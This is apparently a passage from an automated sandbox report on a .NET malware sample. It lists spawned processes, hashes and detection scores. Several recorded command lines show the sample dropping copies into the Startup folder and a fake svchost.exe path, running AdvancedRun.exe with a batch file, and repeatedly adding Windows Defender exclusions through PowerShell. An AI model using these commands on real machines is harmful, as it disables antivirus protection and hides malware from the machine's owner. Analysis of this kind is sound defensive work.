                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 1632 Parent PID: 6668

                                                                                                      General

                                                                                                      Start time:16:11:50
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 3000 Parent PID: 6820

                                                                                                      General

                                                                                                      Start time:16:11:50
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: 7ADA33B7.exe PID: 4256 Parent PID: 3472

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe'
                                                                                                      Imagebase:0x850000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: lKJbVguaav.exe PID: 1560 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:12:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                      Imagebase:0x680000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5728 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:12:05
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 5764 Parent PID: 5728

                                                                                                      General

                                                                                                      Start time:16:12:05
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396
                                                                                                      Imagebase:0xc80000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6088 Parent PID: 3472

                                                                                                      General

                                                                                                      Start time:16:12:08
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Program Files\Common Files\System\E59A6148\svchost.exe'
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 62%, Virustotal, Browse
                                                                                                      • Detection: 34%, Metadefender, Browse
                                                                                                      • Detection: 67%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 3352 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:12:15
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860
                                                                                                      Imagebase:0xc80000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5168 Parent PID: 3472

                                                                                                      General

                                                                                                      Start time:16:12:18
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Program Files\Common Files\System\E59A6148\svchost.exe'
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: MpCmdRun.exe PID: 6232 Parent PID: 6036

                                                                                                      General

                                                                                                      Start time:16:12:36
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff7704d0000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6348 Parent PID: 6232

                                                                                                      General

                                                                                                      Start time:16:12:37
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5292 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:12:40
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 2540 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:40
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 3712 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:12:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 5616 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:12:44
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 6788 Parent PID: 2540

                                                                                                      General

                                                                                                      Start time:16:12:44
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /SpecialRun 4101d8 2540
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 1552 Parent PID: 3712

                                                                                                      General

                                                                                                      Start time:16:12:46
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 2028 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:12:46
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 2272 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:12:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 1264 Parent PID: 5616

                                                                                                      General

                                                                                                      Start time:16:12:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /SpecialRun 4101d8 5616
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 6636 Parent PID: 2028

                                                                                                      General

                                                                                                      Start time:16:12:50
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /SpecialRun 4101d8 2028
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 3108 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5396 Parent PID: 3108

                                                                                                      General

                                                                                                      Start time:16:12:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 4840 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5108 Parent PID: 4840

                                                                                                      General

                                                                                                      Start time:16:12:52
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6164 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:52
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 1456 Parent PID: 6164

                                                                                                      General

                                                                                                      Start time:16:12:53
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 5968 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:53
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6564 Parent PID: 5968

                                                                                                      General

                                                                                                      Start time:16:12:54
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6660 Parent PID: 4256

                                                                                                      General

                                                                                                      Start time:16:12:54
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 5256 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:12:55
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x7ff64e5e0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5088 Parent PID: 6660

                                                                                                      General

                                                                                                      Start time:16:12:56
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 2424 Parent PID: 5256

                                                                                                      General

                                                                                                      Start time:16:12:57
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 5008 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:12:57
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 2920 Parent PID: 5008

                                                                                                      General

                                                                                                      Start time:16:12:58
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 3136 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:12:58
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6432 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:12:59
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 1268 Parent PID: 3136

                                                                                                      General

                                                                                                      Start time:16:13:01
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6640 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:13:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
